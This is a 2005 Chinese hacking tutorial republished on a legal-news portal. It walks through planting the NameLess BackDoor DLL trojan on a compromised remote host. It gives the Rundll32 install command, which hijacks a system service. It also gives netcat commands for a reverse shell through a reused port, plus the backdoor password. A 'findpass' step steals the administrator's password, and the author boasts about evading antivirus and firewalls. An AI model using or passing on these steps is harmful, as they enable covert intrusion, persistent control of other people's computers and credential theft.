法搜网--搜尽天下法律信息
本站网络实名:法搜
设为首页  |  法搜首页 |  法搜论坛 |  法搜排行榜 |  法律新闻  |  案例

  请您加入我们的"法律聚焦"邮件列表.
  报道法律热门新闻、经典案例分析、法律实事讨论


  
  文章搜索
内 容
类 别
  今日热点

上下班被自行车撞伤纳入工伤
刑法修正案八草案提请审议
男子强奸16女子被注射式死刑
女经理15张信用卡透支24万
绑匪心软偷放女人质后自首
检察院决定不予逮捕

国务院首次明确推进房产税改革
北京中小学取消户籍壁垒
外地生可
免费入学
河南坐11年冤狱农民赵作海获65万...
百度告青岛联通流量劫持案件胜诉

  首页 >> 网络安全 >> 精品文章
气疯安全工具——新兴DLL型木马复仇记
WWW.FSOU.COM 来源:黑基 时间:2005-10-26

NameLess BackDoor是一款新兴的DLL型木马,这个木马出世没多久,但绝对是一匹极有潜质的千里驹。


说起NameLess BackDoor的前身来,不得不提及榕哥的BITS和WinEggDrop的PortLess。这两款大名鼎鼎的木马曾经都风光一时,可以说是木马界的元老了。而NameLess BackDoor则是汇集了上面这两款木马的优点,在目标机器的进程管理器中看不到,平时没有端口,提供正向连接和反向连接两种功能。同时NameLess BackDoor又去除了各处 的缺点,比如反弹的cmd.exe进程,在目标机器的进程管理中也可以隐藏无需利用BITS服务等(马儿:不开端口,无进程,看看防火墙和杀毒软件还能拿我怎么办!气死你,哈哈)。


NameLess BackDoor实战演练


将NameLess BackDoor安装上远程主机到连接木马控制主机,就像一场进行在杀毒软件和防火墙眼皮底下,却又无声无悄的暗战。


一、随风潜入夜——安装


下载NameLess BackDoor木马,压缩包中有两个名为NameLess.dll的DLL文件,一个Pack压缩加过壳的,一个是Unpack未压缩加壳的。先在本地用各种杀毒软件扫描一下这两个文件(笔者用的是最新病毒库的KV2005),但是一向以杀毒能力著称的KV2005竟然对这两个木马文件视而不见。呵,这下子可以放心的在任何环境下进行安装了。


怎么将木马安装到远程的电脑上呢?当然最简单的就是扫描要攻击电脑上的系统漏洞,然后进行攻击入侵控制。方法很多了,反正你拿到远程主机的控制权后,将上面的任意一个“NameLess.dll”文件上传到远程主机上的。在这里笔者是使用Ttelnet远程连接后,写入一个FTP下载的BAT文件,直接在本地建立了一个FTP服务器,通过FTP服务器下载上传文件的(这些内容以前杂志介绍过,这里就不作过多的讲解啦)。下面重点来看看我是怎样安装木马文件的吧!


在远程Ttelnet命令窗口中切换到文件上传目录中,并输入如下命令(如图1):


Rundll32 NameLess.dll,Install

执行该命令后后门就被安装成功了,后门会自动替换系统服务Sens的ServiceDll文件,在电脑重启后以Svchost.exe启动。


小提示:由于NameLess BackDoor是一个DLL型木马,因此在安装和启动的过程中,远程主机上的杀毒软件不会有任何提示和反应。


二、穿墙细无声——连接


安装和启动的过程中顺利地搞定了杀毒软件,下面看看NameLess BackDoor怎么让防火墙无能为力的。


小提示:NameLess BackDoor有两种连接方式:正向连接和 反向连接,其中反向方式连接可以让防火墙不会发出任何提示。同时NameLess BackDoor在连接后门时使用了端口复用技术,通过重用系统进程开放的任意一个端口,因此可以轻松的穿透各种防火墙。


我们首先需要扫描远程主机上开放了哪些端口,假设某台远程主机(IP地址为:192.168.1.11)上开放了139端口,那么可以本地打开一个命令窗口,切换到瑞士军刀NC所在的目录中,运行如下命令:


nc

-l -p 12345


命令执行后将在本地监听12345端口,然后再打开一个命令窗口,输入如下命令(如图2):


nc 192.168.1.11 139


建立连接后输入如下内容(如图3):


dargun|192.168.1.11:12345


其中的IP地址可根据具体情况进行更改。命令执行后,在刚才的监听窗口中就可以看到出现了连接提示:“Enter Password:”,输入密码158352692后就可以成功的登陆远程主机而不被防火墙发现了!(如果我是防火墙,一定气疯了,哈)


三、为我所欲为——控制


成功“气死”杀毒软件和“逼疯”防火墙后,现在就可以控制远程主机了。NameLess


BackDoor的强大也体现在它的控制功能上,连接登陆远程主机后,输入help命令,即可看到详细的命令帮助信息(如图4)。如果你使用过winshell或wineggdropshell的话,应该对这种模式的后门就不会陌生,不过就算从来没有使用过这样的后门,也会感觉很简单的。


1.巧盗管理员密码


连接上远程主机后该干什么呢?我得好好想一想……呵呵,看看管理员的密码是多少吧!


在命令窗口中直接输入“findpass”命令,很快就可以看到管理员的密码了(如图5),真是够简单的!

 

来源: 黑基


 

  相关文章
 
设为首页  |  法搜首页 |  法搜论坛 |  法搜排行榜 |  关于法搜  |  招聘信息

本站网络实名:法搜 Copyright © 2007 FSou!  京ICP备05006567号不良信息举报中心

1 1